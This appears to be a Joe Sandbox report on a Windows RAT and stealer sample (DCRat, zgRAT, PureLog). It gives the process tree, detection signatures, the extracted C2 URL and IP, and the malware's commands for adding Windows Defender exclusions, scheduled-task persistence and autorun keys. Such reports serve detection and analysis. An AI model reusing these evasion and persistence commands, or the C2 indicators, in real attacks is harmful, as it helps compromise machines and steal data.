Edit tour

Windows Analysis Report
0J5DzstGPi.exe

Overview

General Information

Sample name:	0J5DzstGPi.exe renamed because original name is a hash value
Original sample name:	fecafe9a80257e221c47577e704498f3.exe
Analysis ID:	1584721
MD5:	fecafe9a80257e221c47577e704498f3
SHA1:	79960aa863f445b93531afc55aad6215a2c1bb08
SHA256:	953d9c6534dd4dda5dc6c53755974e39947672ea521ddfb613a8c28a4f3c10e3
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Drops PE files to the user root directory

Drops executable to a common third party application directory

Drops executables to the windows directory (C:\Windows) and starts them

Infects executable files (exe, dll, sys, html)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: System File Execution Location Anomaly

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

0J5DzstGPi.exe (PID: 6556 cmdline: "C:\Users\user\Desktop\0J5DzstGPi.exe" MD5: FECAFE9A80257E221C47577E704498F3)

csc.exe (PID: 5088 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 3140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 6960 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8C8.tmp" "c:\Windows\System32\CSC7B104E16ED56415BA0A4E98DBA784BC.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

schtasks.exe (PID: 6628 cmdline: schtasks.exe /create /tn "steBCuuQsIefcKufvgYbRBCxKhPRs" /sc MINUTE /mo 6 /tr "'C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1344 cmdline: schtasks.exe /create /tn "0J5DzstGPi0" /sc MINUTE /mo 12 /tr "'C:\Users\user\Desktop\0J5DzstGPi.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

powershell.exe (PID: 6628 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6340 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\steBCuuQsIefcKufvgYbRBCxKhPR.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6604 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\sihost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1344 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7192 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8040 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 7212 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\0J5DzstGPi.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7500 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LBEMCr2GFO.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7772 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7892 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

steBCuuQsIefcKufvgYbRBCxKhPR.exe (PID: 5496 cmdline: "C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe" MD5: FECAFE9A80257E221C47577E704498F3)

0J5DzstGPi.exe (PID: 7404 cmdline: C:\Users\user\Desktop\0J5DzstGPi.exe MD5: FECAFE9A80257E221C47577E704498F3)

0J5DzstGPi.exe (PID: 7452 cmdline: C:\Users\user\Desktop\0J5DzstGPi.exe MD5: FECAFE9A80257E221C47577E704498F3)

sihost.exe (PID: 7652 cmdline: C:\Recovery\sihost.exe MD5: FECAFE9A80257E221C47577E704498F3)

sihost.exe (PID: 7724 cmdline: C:\Recovery\sihost.exe MD5: FECAFE9A80257E221C47577E704498F3)

steBCuuQsIefcKufvgYbRBCxKhPR.exe (PID: 7764 cmdline: "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe" MD5: FECAFE9A80257E221C47577E704498F3)

steBCuuQsIefcKufvgYbRBCxKhPR.exe (PID: 7792 cmdline: "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe" MD5: FECAFE9A80257E221C47577E704498F3)

steBCuuQsIefcKufvgYbRBCxKhPR.exe (PID: 4040 cmdline: "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe" MD5: FECAFE9A80257E221C47577E704498F3)

cmd.exe (PID: 7084 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2640 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 3140 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

steBCuuQsIefcKufvgYbRBCxKhPR.exe (PID: 1308 cmdline: "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe" MD5: FECAFE9A80257E221C47577E704498F3)

sihost.exe (PID: 7528 cmdline: "C:\Recovery\sihost.exe" MD5: FECAFE9A80257E221C47577E704498F3)

0J5DzstGPi.exe (PID: 2520 cmdline: "C:\Users\user\Desktop\0J5DzstGPi.exe" MD5: FECAFE9A80257E221C47577E704498F3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://337703cm.n9sh.top/Basecentral", "MUTEX": "DCR_MUTEX-zKuh3mANZO06VVBE5KQN"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
0J5DzstGPi.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0J5DzstGPi.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\sihost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\sihost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\sihost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\sihost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\sihost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\sihost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1845656712.00000000130A8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000000.1724618410.0000000000992000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: 0J5DzstGPi.exe PID: 6556	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: steBCuuQsIefcKufvgYbRBCxKhPR.exe PID: 4040	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: steBCuuQsIefcKufvgYbRBCxKhPR.exe PID: 5496	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.0J5DzstGPi.exe.990000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.0J5DzstGPi.exe.990000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\0J5DzstGPi.exe, ProcessId: 6556, TargetFilename: C:\Recovery\sihost.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\0J5DzstGPi.exe", ParentImage: C:\Users\user\Desktop\0J5DzstGPi.exe, ParentProcessId: 6556, ParentProcessName: 0J5DzstGPi.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe', ProcessId: 6628, ProcessName: powershell.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Recovery\sihost.exe, CommandLine: C:\Recovery\sihost.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\sihost.exe, NewProcessName: C:\Recovery\sihost.exe, OriginalFileName: C:\Recovery\sihost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\sihost.exe, ProcessId: 7652, ProcessName: sihost.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\0J5DzstGPi.exe, ProcessId: 6556, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\steBCuuQsIefcKufvgYbRBCxKhPR

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\0J5DzstGPi.exe, ProcessId: 6556, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\0J5DzstGPi.exe", ParentImage: C:\Users\user\Desktop\0J5DzstGPi.exe, ParentProcessId: 6556, ParentProcessName: 0J5DzstGPi.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.cmdline", ProcessId: 5088, ProcessName: csc.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\0J5DzstGPi.exe, ProcessId: 6556, TargetFilename: C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\0J5DzstGPi.exe", ParentImage: C:\Users\user\Desktop\0J5DzstGPi.exe, ParentProcessId: 6556, ParentProcessName: 0J5DzstGPi.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe', ProcessId: 6628, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\0J5DzstGPi.exe", ParentImage: C:\Users\user\Desktop\0J5DzstGPi.exe, ParentProcessId: 6556, ParentProcessName: 0J5DzstGPi.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.cmdline", ProcessId: 5088, ProcessName: csc.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-06T10:32:22.979868+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49737	185.158.202.52	80	TCP
2025-01-06T10:32:47.962695+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49738	185.158.202.52	80	TCP
2025-01-06T10:32:56.041267+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49739	185.158.202.52	80	TCP
2025-01-06T10:33:05.478784+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49782	185.158.202.52	80	TCP
2025-01-06T10:33:08.131571+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49798	185.158.202.52	80	TCP
2025-01-06T10:33:15.150710+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49834	185.158.202.52	80	TCP
2025-01-06T10:33:19.955460+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49865	185.158.202.52	80	TCP
2025-01-06T10:33:42.144023+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49992	185.158.202.52	80	TCP
2025-01-06T10:33:51.433463+0100	2048095	1	A Network Trojan was detected	192.168.2.4	50011	185.158.202.52	80	TCP
2025-01-06T10:33:54.546858+0100	2048095	1	A Network Trojan was detected	192.168.2.4	50012	185.158.202.52	80	TCP
2025-01-06T10:33:59.945702+0100	2048095	1	A Network Trojan was detected	192.168.2.4	50013	185.158.202.52	80	TCP
2025-01-06T10:34:03.737223+0100	2048095	1	A Network Trojan was detected	192.168.2.4	50014	185.158.202.52	80	TCP
2025-01-06T10:34:26.981496+0100	2048095	1	A Network Trojan was detected	192.168.2.4	50015	185.158.202.52	80	TCP
2025-01-06T10:34:38.119621+0100	2048095	1	A Network Trojan was detected	192.168.2.4	50016	185.158.202.52	80	TCP
2025-01-06T10:34:45.119629+0100	2048095	1	A Network Trojan was detected	192.168.2.4	50017	185.158.202.52	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 0J5DzstGPi.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://337703cm.n9sh.top/	Avira URL Cloud: Label: malware
Source: http://337703cm.n9sh.top/Basecentral.php	Avira URL Cloud: Label: malware
Source: http://337703cm.n9sh.top	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\EOeBPHNE.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\LBEMCr2GFO.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\sihost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\PCJszSHm.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt

Found malware configuration

Source: 00000000.00000002.1845656712.00000000130A8000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://337703cm.n9sh.top/Basecentral", "MUTEX": "DCR_MUTEX-zKuh3mANZO06VVBE5KQN"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	ReversingLabs: Detection: 71%
Source: C:\Recovery\sihost.exe	ReversingLabs: Detection: 71%
Source: C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe	ReversingLabs: Detection: 71%
Source: C:\Users\Default\steBCuuQsIefcKufvgYbRBCxKhPR.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\EOeBPHNE.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\MzWJdjDq.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\PCJszSHm.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\UciiGfGr.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\fQNZqrBZ.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\oMZxvDXp.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\tdboTeDy.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\xcpeKNWo.log	ReversingLabs: Detection: 70%
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	ReversingLabs: Detection: 71%

Multi AV Scanner detection for submitted file

Source: 0J5DzstGPi.exe	Virustotal: Detection: 59%			Perma Link
Source: 0J5DzstGPi.exe	ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\BKvCmawc.log	Joe Sandbox ML: detected
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Joe Sandbox ML: detected
Source: C:\Recovery\sihost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\PCJszSHm.log	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 0J5DzstGPi.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1845656712.00000000130A8000.00000004.00000800.00020000.00000000.sdmp	String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"}}
Source: 00000000.00000002.1845656712.00000000130A8000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-zKuh3mANZO06VVBE5KQN","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
Source: 00000000.00000002.1845656712.00000000130A8000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://337703cm.n9sh.top/","Basecentral"]]

Source: 0J5DzstGPi.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Directory created: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe			Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Directory created: C:\Program Files\Mozilla Firefox\17c9f4d4cfaa6e			Jump to behavior

Source: 0J5DzstGPi.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.PDB source: steBCuuQsIefcKufvgYbRBCxKhPR.exe, 0000002F.00000002.2158771619.000000001B3D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.pdb source: 0J5DzstGPi.exe, 00000000.00000002.1803810582.00000000034D9000.00000004.00000800.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49737 -> 185.158.202.52:80
